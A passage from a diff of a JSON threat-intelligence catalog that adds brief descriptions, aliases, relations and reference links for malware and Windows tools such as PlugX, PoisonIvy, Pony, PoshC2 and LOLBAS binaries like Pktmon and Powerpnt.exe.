"similar" + } + ], + "uuid": "c29799e7-8d70-4312-890d-39eff939af8c", + "value": "Pktmon.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Capture Network Packets on the windows 10 with October 2018 Update or later.\n\n**Author:** Derek Johnson\n\n**Paths:**\n* c:\\windows\\system32\\pktmon.exe\n* c:\\windows\\syswow64\\pktmon.exe\n\n**Resources:**\n* [https://binar-x79.com/windows-10-secret-sniffer/](https://binar-x79.com/windows-10-secret-sniffer/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pktmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml)\n* IOC: .etl files found on system[[Pktmon.exe - LOLBAS Project](/references/8f0ad4ed-869b-4332-b091-7551262cff29)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5139", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "c29799e7-8d70-4312-890d-39eff939af8c", + "type": "similar" + } + ], + "uuid": "0b0ae21a-987c-44c5-93db-3b228544eb99", + "value": "Pktmon" + }, + { + "description": "[PLAINTEE](https://app.tidalcyber.com/software/9445f18a-a796-447a-a35f-94a9fb72411c) is a malware sample that has been used by [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) in targeted attacks in Singapore and Cambodia. [[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0254", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "type": "used-by" + }, + { + "dest-uuid": "21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b", + "type": "similar" + } + ], + "uuid": "9445f18a-a796-447a-a35f-94a9fb72411c", + "value": "PLAINTEE" + }, + { + "description": "[PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) is a remote access tool (RAT) and downloader used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)][[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)] [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) has also been referred to as [TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b), though more recent reporting indicates likely separation between the two. [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) was observed in use as early as March 2017.[[JPCert TSCookie March 2018](https://app.tidalcyber.com/references/ff1717f7-0d2e-4947-87d7-44576affe9f8)][[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0435", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "used-by" + }, + { + "dest-uuid": "b57f419e-8b12-49d3-886b-145383725dcd", + "type": "similar" + } + ], + "uuid": "9a890a85-afbe-4c35-a3e7-1adad481bdf7", + "value": "PLEAD" + }, + { + "description": "", + "meta": { + "id": "e5b7959d-1bdf-4ee4-ae5b-1b8261017301", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6117e2b5-140b-49d2-89b7-76d91e6c798c", + "type": "similar" + } + ], + "uuid": "d7602f4b-ebea-466b-9e7f-17fe5e7238d6", + "value": "PuTTY Link" + }, + { + "description": "Plink is a tool used to automate Secure Shell (SSH) actions on Windows.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5041", + "source": "Tidal Cyber", + "tags": [ + "a1427c89-2ebd-440f-b7e0-9728e3ef2096", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "d7602f4b-ebea-466b-9e7f-17fe5e7238d6", + "type": "similar" + } + ], + "uuid": "6117e2b5-140b-49d2-89b7-76d91e6c798c", + "value": "Plink" + }, + { + "description": "[[CIRCL PlugX March 2013](https://app.tidalcyber.com/references/8ab89236-6994-43a3-906c-383e294f65d1)]", + "meta": { + "id": "7af22b0e-4908-433d-867b-f7e656730c83" + }, + "related": [ + { + "dest-uuid": "070b56f4-7810-4dad-b85f-bdfce9c08c10", + "type": "similar" + } + ], + "uuid": "c0090129-1ec8-46c2-94da-7094a1d1e8ca", + "value": "DestroyRAT" + }, + { + "description": "[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)][[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)][[CIRCL PlugX March 2013](https://app.tidalcyber.com/references/8ab89236-6994-43a3-906c-383e294f65d1)]", + "meta": { + "id": "1ca41d56-b493-485e-8be7-8df56bbd6a64" + }, + "related": [ + { + "dest-uuid": "070b56f4-7810-4dad-b85f-bdfce9c08c10", + "type": "similar" + } + ], + "uuid": "c3f88c02-a063-443a-a555-c582639f648c", + "value": "Sogu" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "54d00c23-dac1-4ec8-afd3-336ee81a5f6e" + }, + "related": [ + { + "dest-uuid": "070b56f4-7810-4dad-b85f-bdfce9c08c10", + "type": "similar" + } + ], + "uuid": "6795a6c5-8701-4fbd-b8f4-ff0b5bd04cc2", + "value": "Thoper" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "72732cf8-e171-4c4c-8125-d1ecbc35c7d5" + }, + "related": [ + { + "dest-uuid": "070b56f4-7810-4dad-b85f-bdfce9c08c10", + "type": "similar" + } + ], + "uuid": "cca25e4e-d315-49e2-bfc1-be1ee4fac071", + "value": "TVT" + }, + { + "description": "[[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)]", + "meta": { + "id": "0a70c7f8-48c1-40b3-bbd5-6309f5fbc39f" + }, + "related": [ + { + "dest-uuid": "070b56f4-7810-4dad-b85f-bdfce9c08c10", + "type": "similar" + } + ], + "uuid": "6fb9ef48-3016-4f37-8254-1ae52022b6da", + "value": "Kaba" + }, + { + "description": "[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)][[CIRCL PlugX March 2013](https://app.tidalcyber.com/references/8ab89236-6994-43a3-906c-383e294f65d1)]", + "meta": { + "id": "845347f6-c3a2-4518-a7a4-629a1424f622" + }, + "related": [ + { + "dest-uuid": "070b56f4-7810-4dad-b85f-bdfce9c08c10", + "type": "similar" + } + ], + "uuid": "7ae0cf0a-daad-490c-90da-fe0e1f09a31c", + "value": "Korplug" + }, + { + "description": "[PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)][[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)][[New DragonOK](https://app.tidalcyber.com/references/82c1ed0d-a41d-4212-a3ae-a1d661bede2d)][[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0013", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "f1477581-d485-403f-a95f-c56bf88c5d1e", + "type": "used-by" + }, + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "e343c1f1-458c-467b-bc4a-c1b97b2127e3", + "type": "used-by" + }, + { + "dest-uuid": "b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "6932662a-53a7-4e43-877f-6e940e2d744b", + "type": "used-by" + }, + { + "dest-uuid": "f2c2db08-624c-46b9-b7ed-b22c21b81813", + "type": "used-by" + }, + { + "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", + "type": "similar" + }, + { + "dest-uuid": "c0090129-1ec8-46c2-94da-7094a1d1e8ca", + "type": "similar" + }, + { + "dest-uuid": "c3f88c02-a063-443a-a555-c582639f648c", + "type": "similar" + }, + { + "dest-uuid": "6795a6c5-8701-4fbd-b8f4-ff0b5bd04cc2", + "type": "similar" + }, + { + "dest-uuid": "cca25e4e-d315-49e2-bfc1-be1ee4fac071", + "type": "similar" + }, + { + "dest-uuid": "6fb9ef48-3016-4f37-8254-1ae52022b6da", + "type": "similar" + }, + { + "dest-uuid": "7ae0cf0a-daad-490c-90da-fe0e1f09a31c", + "type": "similar" + } + ], + "uuid": "070b56f4-7810-4dad-b85f-bdfce9c08c10", + "value": "PlugX" + }, + { + "description": "[pngdowner](https://app.tidalcyber.com/software/95c273d2-3081-4cb5-8d41-37eb4e90264d) is malware used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple \"download-and-\nexecute\" utility. [[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0067", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6005f4a9-fe26-4237-a44e-3f6cbb1fe75c", + "type": "used-by" + }, + { + "dest-uuid": "800bdfba-6d66-480f-9f45-15845c05cb5d", + "type": "similar" + } + ], + "uuid": "95c273d2-3081-4cb5-8d41-37eb4e90264d", + "value": "pngdowner" + }, + { + "description": "[[Pnputil.exe - LOLBAS Project](/references/21d0419a-5454-4808-b7e6-2b1b9de08ed6)]", + "meta": { + "id": "ff437c05-711f-4f45-9746-8a8106d794fa", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "dd1e8b57-4900-4823-b194-1526c1e00099", + "type": "similar" + } + ], + "uuid": "6f09dbde-ae7a-4781-b317-286da2c88003", + "value": "Pnputil.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used for installing drivers\n\n**Author:** Hai vaknin (lux)\n\n**Paths:**\n* C:\\Windows\\system32\\pnputil.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml)[[Pnputil.exe - LOLBAS Project](/references/21d0419a-5454-4808-b7e6-2b1b9de08ed6)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5140", + "source": "Tidal Cyber", + "tags": [ + "6d924d43-5de3-45de-8466-a8c47a5b9e68", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6f09dbde-ae7a-4781-b317-286da2c88003", + "type": "similar" + } + ], + "uuid": "dd1e8b57-4900-4823-b194-1526c1e00099", + "value": "Pnputil" + }, + { + "description": "[PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) derived its name from references in the code to poet William Shakespeare. [[Talos PoetRAT April 2020](https://app.tidalcyber.com/references/fe2a79a5-bc50-4147-b919-f3d0eb7430b6)][[Talos PoetRAT October 2020](https://app.tidalcyber.com/references/5862c90a-3bae-48d0-8749-9a6510fe3630)][[Dragos Threat Report 2020](https://app.tidalcyber.com/references/8bb3147c-3178-4449-9978-f1248b1bcb0a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0428", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c", + "type": "similar" + } + ], + "uuid": "79b4f277-3b18-4aa7-9f96-44b35b23166b", + "value": "PoetRAT" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "543d46b9-9205-4fb6-b4ab-890f15894f94" + }, + "related": [ + { + "dest-uuid": "1d87a695-7989-49ae-ac1a-b6601db565c3", + "type": "similar" + } + ], + "uuid": "76cb912d-02e3-4f99-8cde-6f9b3f75f752", + "value": "Breut" + }, + { + "description": "[[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)] [[Symantec Darkmoon Sept 2014](https://app.tidalcyber.com/references/3362a507-03c3-4236-b484-8144248b5cac)]", + "meta": { + "id": "f8e1f3a1-648c-4439-956c-1e2503451292" + }, + "related": [ + { + "dest-uuid": "1d87a695-7989-49ae-ac1a-b6601db565c3", + "type": "similar" + } + ], + "uuid": "5f9d7b30-b187-4437-8214-e6e966958553", + "value": "Poison Ivy" + }, + { + "description": "[[Symantec Darkmoon Sept 2014](https://app.tidalcyber.com/references/3362a507-03c3-4236-b484-8144248b5cac)]", + "meta": { + "id": "1c9529d5-8187-42ab-901e-e6810946fb36" + }, + "related": [ + { + "dest-uuid": "1d87a695-7989-49ae-ac1a-b6601db565c3", + "type": "similar" + } + ], + "uuid": "69b67620-b26e-42d3-bb65-b9a3fc734d19", + "value": "Darkmoon" + }, + { + "description": "[PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3) is a popular remote access tool (RAT) that has been used by many groups.[[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)][[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)][[Symantec Darkmoon Aug 2005](https://app.tidalcyber.com/references/7088234d-a6fc-49ad-b4fd-2fe8ca333c1d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0012", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4510ce41-27b9-479c-9bf3-a328b77bae29", + "type": "used-by" + }, + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "used-by" + }, + { + "dest-uuid": "988f5312-834e-48ea-93b7-e6e01ee0938d", + "type": "used-by" + }, + { + "dest-uuid": "f2c2db08-624c-46b9-b7ed-b22c21b81813", + "type": "used-by" + }, + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "used-by" + }, + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "used-by" + }, + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "type": "used-by" + }, + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "60936d3c-37ed-4116-a407-868da3aa4446", + "type": "used-by" + }, + { + "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", + "type": "similar" + }, + { + "dest-uuid": "76cb912d-02e3-4f99-8cde-6f9b3f75f752", + "type": "similar" + }, + { + "dest-uuid": "5f9d7b30-b187-4437-8214-e6e966958553", + "type": "similar" + }, + { + "dest-uuid": "69b67620-b26e-42d3-bb65-b9a3fc734d19", + "type": "similar" + } + ], + "uuid": "1d87a695-7989-49ae-ac1a-b6601db565c3", + "value": "PoisonIvy" + }, + { + "description": "[PolyglotDuke](https://app.tidalcyber.com/software/3b7179fa-7b8b-4068-b224-d8d9c642964d) is a downloader that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2013. [PolyglotDuke](https://app.tidalcyber.com/software/3b7179fa-7b8b-4068-b224-d8d9c642964d) has been used to drop [MiniDuke](https://app.tidalcyber.com/software/2bb16809-6bc3-46c3-b28a-39cb49410340).[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0518", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "3d57dcc4-be99-4613-9482-d5218f5ec13e", + "type": "similar" + } + ], + "uuid": "3b7179fa-7b8b-4068-b224-d8d9c642964d", + "value": "PolyglotDuke" + }, + { + "description": "[Pony](https://app.tidalcyber.com/software/555b612e-3f0d-421d-b2a7-63eb2d1ece5f) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.[[Malwarebytes Pony April 2016](https://app.tidalcyber.com/references/f8700002-5da6-4cb8-be62-34e421d2a573)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0453", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "222ba512-32d9-49ac-aefd-50ce981ce2ce", + "type": "similar" + } + ], + "uuid": "555b612e-3f0d-421d-b2a7-63eb2d1ece5f", + "value": "Pony" + }, + { + "description": "[POORAIM](https://app.tidalcyber.com/software/1353d695-5bae-4593-988f-9bd07a6fd1bb) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) in campaigns since at least 2014. [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0216", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "53d47b09-09c2-4015-8d37-6633ecd53f79", + "type": "similar" + } + ], + "uuid": "1353d695-5bae-4593-988f-9bd07a6fd1bb", + "value": "POORAIM" + }, + { + "description": "[PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Although [PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[[GitHub PoshC2](https://app.tidalcyber.com/references/45e79c0e-a2f6-4b56-b621-4142756bd1b1)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0378", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "4b57c098-f043-4da2-83ef-7588a6d426bc", + "type": "similar" + } + ], + "uuid": "a3a03835-79bf-4558-8e80-7983aeb842fb", + "value": "PoshC2" + }, + { + "description": "[POSHSPY](https://app.tidalcyber.com/software/b92f28c4-cbc8-4721-ac79-2d8bdf5247e5) is a backdoor that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. [[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0150", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "5e595477-2e78-4ce7-ae42-e0b059b17808", + "type": "similar" + } + ], + "uuid": "b92f28c4-cbc8-4721-ac79-2d8bdf5247e5", + "value": "POSHSPY" + }, + { + "description": "[PowerDuke](https://app.tidalcyber.com/software/d9e4f4a1-dd41-424e-986a-b9a39ebea805) is a backdoor that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. [[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0139", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "00c3bfcb-99bd-4767-8c03-b08f585f5c8a", + "type": "similar" + } + ], + "uuid": "d9e4f4a1-dd41-424e-986a-b9a39ebea805", + "value": "PowerDuke" + }, + { + "description": "[PowerLess](https://app.tidalcyber.com/software/8b9159c1-db48-472b-9897-34325da5dca7) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) since at least 2022.[[Cybereason PowerLess February 2022](https://app.tidalcyber.com/references/095aaa25-b674-4313-bc4f-3227b00c0459)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1012", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "35ee9bf3-264b-4411-8a8f-b58cec8f35e4", + "type": "similar" + } + ], + "uuid": "8b9159c1-db48-472b-9897-34325da5dca7", + "value": "PowerLess" + }, + { + "description": "[Power Loader](https://app.tidalcyber.com/software/018ee1d9-35af-49dc-a667-11b77cd76f46) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. [[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)] [[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]", + "meta": { + "platforms": [], + "software_attack_id": "S0177", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3", + "type": "similar" + } + ], + "uuid": "018ee1d9-35af-49dc-a667-11b77cd76f46", + "value": "Power Loader" + }, + { + "description": "[[Powerpnt.exe - LOLBAS Project](/references/23c48ab3-9426-4949-9a35-d1b9ecb4bb47)]", + "meta": { + "id": "b38a5e4f-22db-4fd4-b115-ef384754f5ee", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "155053be-8a2c-4d5e-8206-36d992c5651d", + "type": "similar" + } + ], + "uuid": "6f48252d-3e86-415b-ab77-8c833d608b47", + "value": "Powerpnt.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary.\n\n**Author:** Reegun J (OCBC Bank)\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe\n\n**Resources:**\n* [https://twitter.com/reegun21/status/1150032506504151040](https://twitter.com/reegun21/status/1150032506504151040)\n* [https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml)\n* IOC: Suspicious Office application Internet/network traffic[[Powerpnt.exe - LOLBAS 